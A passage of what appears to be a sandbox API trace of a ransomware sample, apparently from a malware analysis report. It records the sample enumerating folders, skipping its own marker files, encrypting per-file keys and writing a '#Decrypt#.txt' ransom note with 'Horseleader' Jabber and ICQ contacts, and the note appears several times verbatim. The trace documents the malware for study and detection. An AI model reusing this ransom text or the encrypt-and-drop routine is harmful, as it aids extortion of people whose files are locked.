Size=0x840) returned 0x7db828 [0234.243] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\*") returned 62 [0234.243] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0234.244] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0234.244] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\.") returned 62 [0234.244] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0234.244] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="..", cAlternateFileName="")) returned 1 [0234.244] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0234.244] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\..") returned 63 [0234.244] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0234.244] lstrcmpW (lpString1="..", lpString2="..") returned 
0 [0234.244] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4bbb926, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe4dd0c3c, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe4dd0c3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0234.244] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0234.244] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\tipresx.dll.mui") returned 76 [0234.244] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".horseleader") returned 0x0 [0234.244] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0234.244] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0234.244] lstrlenW (lpString=".testttjffg") returned 11 [0234.244] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\tipresx.dll.mui", lpSrch=".testttjffg") returned 0x0 [0234.244] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0234.245] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0234.245] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-pt\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.245] 
FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4bbb926, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe4dd0c3c, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe4dd0c3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0234.245] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0234.245] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\#Decrypt#.txt") returned 74 [0234.245] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-pt\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0234.245] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0234.245] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0234.246] lstrlenA (lpString="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") returned 1368 [0234.246] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0234.247] CloseHandle (hObject=0x158) returned 1 [0234.247] GetProcessHeap () returned 0x780000 [0234.247] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0234.247] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ro-RO", cAlternateFileName="")) returned 1 [0234.247] lstrcmpiW (lpString1="ro-RO", lpString2="Windows") returned -1 [0234.247] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO") returned 60 [0234.247] lstrcmpW (lpString1="ro-RO", lpString2=".") returned 1 [0234.247] lstrcmpW (lpString1="ro-RO", lpString2="..") returned 1 [0234.247] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0234.247] GetProcessHeap () returned 0x780000 [0234.247] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, 
Size=0x840) returned 0x7db828 [0234.247] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\*") returned 62 [0234.247] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0234.248] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0234.248] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\.") returned 62 [0234.248] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0234.248] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="..", cAlternateFileName="")) returned 1 [0234.248] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0234.248] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\..") returned 63 [0234.248] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0234.248] lstrcmpW (lpString1="..", lpString2="..") returned 
0 [0234.248] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe215549d, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe2390910, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe2390910, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0234.248] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0234.248] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\tipresx.dll.mui") returned 76 [0234.248] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".horseleader") returned 0x0 [0234.248] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0234.248] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0234.248] lstrlenW (lpString=".testttjffg") returned 11 [0234.248] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\tipresx.dll.mui", lpSrch=".testttjffg") returned 0x0 [0234.248] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0234.248] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0234.248] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ro-ro\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.249] 
FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe215549d, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe2390910, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe2390910, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0234.249] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0234.249] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\#Decrypt#.txt") returned 74 [0234.249] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ro-ro\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0234.249] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0234.249] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0234.250] lstrlenA (lpString="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") returned 1368 [0234.250] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0234.251] CloseHandle (hObject=0x158) returned 1 [0234.251] GetProcessHeap () returned 0x780000 [0234.251] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0234.251] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x42a795bf, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x42a795bf, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x43f1e320, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x29800, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="rtscom.dll", cAlternateFileName="")) returned 1 [0234.251] lstrcmpiW (lpString1="rtscom.dll", lpString2="Windows") returned -1 [0234.251] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\rtscom.dll") returned 65 [0234.251] StrStrIW (lpFirst="rtscom.dll", lpSrch=".horseleader") returned 0x0 [0234.251] lstrcmpW (lpString1="rtscom.dll", lpString2="#Decrypt#.txt") returned 1 [0234.251] lstrcmpW (lpString1="rtscom.dll", lpString2="_uninstalling_.png") returned 1 [0234.251] lstrlenW (lpString=".testttjffg") returned 11 [0234.251] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\ink\\rtscom.dll", lpSrch=".testttjffg") returned 0x0 [0234.251] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.251] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.252] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\rtscom.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\rtscom.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.252] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0234.252] lstrcmpiW (lpString1="ru-RU", lpString2="Windows") returned -1 [0234.252] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU") returned 60 [0234.252] lstrcmpW (lpString1="ru-RU", lpString2=".") returned 1 [0234.252] lstrcmpW (lpString1="ru-RU", lpString2="..") returned 1 [0234.252] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0234.252] GetProcessHeap () returned 0x780000 [0234.252] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0234.252] wnsprintfW (in: pszDest=0x7db828, 
cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU\\*") returned 62 [0234.252] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0234.253] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0234.253] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU\\.") returned 62 [0234.253] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0234.253] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="..", cAlternateFileName="")) returned 1 [0234.253] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0234.253] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU\\..") returned 63 [0234.254] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0234.254] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0234.254] FindNextFileW (in: hFindFile=0x7c6760, 
lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea6a1a1d, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xea8dce90, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xea902fed, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0234.254] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0234.254] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU\\tipresx.dll.mui") returned 76 [0234.254] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".horseleader") returned 0x0 [0234.254] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0234.254] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0234.254] lstrlenW (lpString=".testttjffg") returned 11 [0234.254] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU\\tipresx.dll.mui", lpSrch=".testttjffg") returned 0x0 [0234.254] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0234.254] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0234.254] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ru-ru\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.255] FindNextFileW (in: hFindFile=0x7c6760, 
lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea6a1a1d, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xea8dce90, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xea902fed, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0234.255] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0234.255] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU\\#Decrypt#.txt") returned 74 [0234.255] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ru-ru\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0234.257] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0234.257] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0234.258] lstrlenA (lpString="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") returned 1368 [0234.258] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0234.258] CloseHandle (hObject=0x158) returned 1 [0234.258] GetProcessHeap () returned 0x780000 [0234.258] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0234.258] FindNextFileW (in: hFindFile=0x7c6860, 